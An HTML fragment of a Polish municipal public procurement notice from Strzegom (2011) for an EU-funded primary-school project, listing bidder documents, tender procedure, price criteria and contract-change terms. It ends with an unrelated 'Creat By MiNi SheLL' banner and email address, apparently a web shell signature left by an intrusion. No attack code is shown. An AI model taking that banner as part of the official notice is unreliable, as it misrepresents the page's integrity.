<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. W szczególności Zamawiający dopuszcza: 
1) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.,
2) zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować pod warunkiem ,że takiej zgody udzieli instytucja dofinansowująca i, że Zamawiający nie straci dofinansowania, 
3) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
4) ze względu na dofinansowanie zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z wykonawcą do postanowień umowy o dofinansowanie,
5) zmiany harmonogramu realizacji zadania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Rynek 38, 58-150 Strzegom, pok. 15, za zaliczeniem pocztowym 
Cena 18,20 zł (plus koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2011 godzina 10:30, miejsce: Urząd Miejski, Rynek 38, 58-150 Strzegom - Biuro Obsługo Interesanta, parter - pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych, dla których organem prowadzącym jest Gmina Strzegom współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki.
Uprawnieni do kontaktu z  wykonawcami są: Monika Pawlik, Aneta Jasiczek. Kryteria oceny ofert: cena 100%.
Zamawiający nie zamierza zawierać umowy ramowej.
Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com